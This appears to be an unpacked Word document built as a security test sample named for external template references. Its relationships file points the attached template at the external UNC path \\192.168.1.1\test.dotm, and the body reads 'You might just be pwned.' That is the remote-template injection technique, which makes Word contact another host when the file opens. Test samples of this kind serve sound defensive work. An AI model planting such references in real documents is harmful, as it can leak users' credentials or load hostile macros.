
<file path=Votiro_Test_External_Template_Reference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Votiro_Test_External_Template_Reference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Votiro_Test_External_Template_Reference/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Votiro_Test_External_Template_Reference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Stasiuk</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-01T13:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-03T22:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=Votiro_Test_External_Template_Reference/word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/>
<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/>
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\192.168.1.1\test.dotm" TargetMode="External"/>

</Relationships>
</file>

<file path=Votiro_Test_External_Template_Reference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34CA" w14:textId="6747697C" w:rsidR="00E16783" w:rsidRDefault="00DE7BFA">
      <w:r>
        <w:t xml:space="preserve">You might just be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E1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Votiro_Test_External_Template_Reference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Votiro_Test_External_Template_Reference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F5"/>
    <w:rsid w:val="003D2A0B"/>
    <w:rsid w:val="004333F5"/>
    <w:rsid w:val="00643862"/>
    <w:rsid w:val="006807F7"/>
    <w:rsid w:val="009A08C7"/>
    <w:rsid w:val="00C6192A"/>
    <w:rsid w:val="00DE7BFA"/>
    <w:rsid w:val="00E1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1AE7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1D5B19E4-6ADE-B24A-9671-C1B7F4B8951C}"/>
</w:settings>
</file>

<file path=Votiro_Test_External_Template_Reference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Votiro_Test_External_Template_Reference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Votiro_Test_External_Template_Reference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